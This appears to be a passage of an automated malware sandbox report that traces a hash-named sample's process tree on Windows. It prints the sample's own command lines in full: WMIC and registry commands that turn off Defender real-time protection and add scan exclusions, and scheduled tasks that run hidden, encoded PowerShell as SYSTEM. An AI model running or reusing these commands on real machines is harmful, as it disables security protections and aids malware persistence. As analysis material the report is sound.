760	HPEfvXg.exe
2856	powershell.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
1624	powershell.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeIncreaseQuotaPrivilege	2640	WMIC.exe
Token: SeSecurityPrivilege	2640	WMIC.exe
Token: SeTakeOwnershipPrivilege	2640	WMIC.exe
Token: SeLoadDriverPrivilege	2640	WMIC.exe
Token: SeSystemProfilePrivilege	2640	WMIC.exe
Token: SeSystemtimePrivilege	2640	WMIC.exe
Token: SeProfSingleProcessPrivilege	2640	WMIC.exe
Token: SeIncBasePriorityPrivilege	2640	WMIC.exe
Token: SeCreatePagefilePrivilege	2640	WMIC.exe
Token: SeBackupPrivilege	2640	WMIC.exe
Token: SeRestorePrivilege	2640	WMIC.exe
Token: SeShutdownPrivilege	2640	WMIC.exe
Token: SeDebugPrivilege	2640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2640	WMIC.exe
Token: SeRemoteShutdownPrivilege	2640	WMIC.exe
Token: SeUndockPrivilege	2640	WMIC.exe
Token: SeManageVolumePrivilege	2640	WMIC.exe
Token: 33	2640	WMIC.exe
Token: 34	2640	WMIC.exe
Token: 35	2640	WMIC.exe
Token: SeDebugPrivilege	1696	powershell.EXE
Token: SeDebugPrivilege	1876	powershell.EXE
Token: SeDebugPrivilege	288	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2684	WMIC.exe
Token: SeSecurityPrivilege	2684	WMIC.exe
Token: SeTakeOwnershipPrivilege	2684	WMIC.exe
Token: SeLoadDriverPrivilege	2684	WMIC.exe
Token: SeSystemtimePrivilege	2684	WMIC.exe
Token: SeBackupPrivilege	2684	WMIC.exe
Token: SeRestorePrivilege	2684	WMIC.exe
Token: SeShutdownPrivilege	2684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2684	WMIC.exe
Token: SeUndockPrivilege	2684	WMIC.exe
Token: SeManageVolumePrivilege	2684	WMIC.exe
Token: SeDebugPrivilege	1924	powershell.EXE
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1416	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1416	WMIC.exe
Token: SeSecurityPrivilege	1416	WMIC.exe
Token: SeTakeOwnershipPrivilege	1416	WMIC.exe
Token: SeLoadDriverPrivilege	1416	WMIC.exe
Token: SeSystemtimePrivilege	1416	WMIC.exe
Token: SeBackupPrivilege	1416	WMIC.exe
Token: SeRestorePrivilege	1416	WMIC.exe
Token: SeShutdownPrivilege	1416	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1416	WMIC.exe
Token: SeUndockPrivilege	1416	WMIC.exe
Token: SeManageVolumePrivilege	1416	WMIC.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2152	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2152	WMIC.exe
Token: SeSecurityPrivilege	2152	WMIC.exe
Token: SeTakeOwnershipPrivilege	2152	WMIC.exe
Token: SeLoadDriverPrivilege	2152	WMIC.exe
Token: SeSystemtimePrivilege	2152	WMIC.exe
Token: SeBackupPrivilege	2152	WMIC.exe
Token: SeRestorePrivilege	2152	WMIC.exe
Token: SeShutdownPrivilege	2152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2152	WMIC.exe
Token: SeUndockPrivilege	2152	WMIC.exe
Token: SeManageVolumePrivilege	2152	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exeInstall.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exeNsUPKyH.exetaskeng.exe

description	pid	process	target process
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2440 wrote to memory of 2612	2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 2612 wrote to memory of 1252	2612	Install.exe	Install.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 1252 wrote to memory of 2812	1252	Install.exe	forfiles.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2812 wrote to memory of 2716	2812	forfiles.exe	cmd.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2548	2716	cmd.exe	powershell.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 2548 wrote to memory of 2640	2548	powershell.exe	WMIC.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 1252 wrote to memory of 2992	1252	Install.exe	schtasks.exe
PID 2972 wrote to memory of 1956	2972	taskeng.exe	NsUPKyH.exe
PID 2972 wrote to memory of 1956	2972	taskeng.exe	NsUPKyH.exe
PID 2972 wrote to memory of 1956	2972	taskeng.exe	NsUPKyH.exe
PID 2972 wrote to memory of 1956	2972	taskeng.exe	NsUPKyH.exe
PID 1956 wrote to memory of 1772	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 1772	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 1772	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 1772	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 2100	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 2100	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 2100	1956	NsUPKyH.exe	schtasks.exe
PID 1956 wrote to memory of 2100	1956	NsUPKyH.exe	schtasks.exe
PID 2624 wrote to memory of 1696	2624	taskeng.exe	powershell.EXE
PID 2624 wrote to memory of 1696	2624	taskeng.exe	powershell.EXE
PID 2624 wrote to memory of 1696	2624	taskeng.exe	powershell.EXE

C:\Users\Admin\AppData\Local\Temp\bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe
"C:\Users\Admin\AppData\Local\Temp\bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2440

C:\Users\Admin\AppData\Local\Temp\7zSF3D.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2612

C:\Users\Admin\AppData\Local\Temp\7zS115F.tmp\Install.exe
.\Install.exe /wdidMCP "385137" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\NsUPKyH.exe\" pa /uhdidRk 385137 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 600
4⤵
- Loads dropped DLL
- Program crash
PID:764

C:\Windows\system32\taskeng.exe
taskeng.exe {316C13A3-6BD4-4AB6-B2B5-D85B2E2D5AC0} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2972

C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\NsUPKyH.exe
C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\NsUPKyH.exe pa /uhdidRk 385137 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfwDalDnr" /SC once /ST 03:17:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1772

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfwDalDnr"
3⤵
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gfwDalDnr"
3⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:2236

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1156

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1800

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsKjjNEGg" /SC once /ST 00:22:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:280

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsKjjNEGg"
3⤵
PID:1616

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsKjjNEGg"
3⤵
PID:1664

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:2448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2312

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1528

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2580

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2568

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2700

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2544

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\XwIFwyvoUqntekhn\aQXKONtq\iSuSSBBSAwVopSLr.wsf"
3⤵
PID:2708

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\XwIFwyvoUqntekhn\aQXKONtq\iSuSSBBSAwVopSLr.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:2776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:3064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:3028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:3016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2144

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2324

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:32
4⤵
PID:748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1380

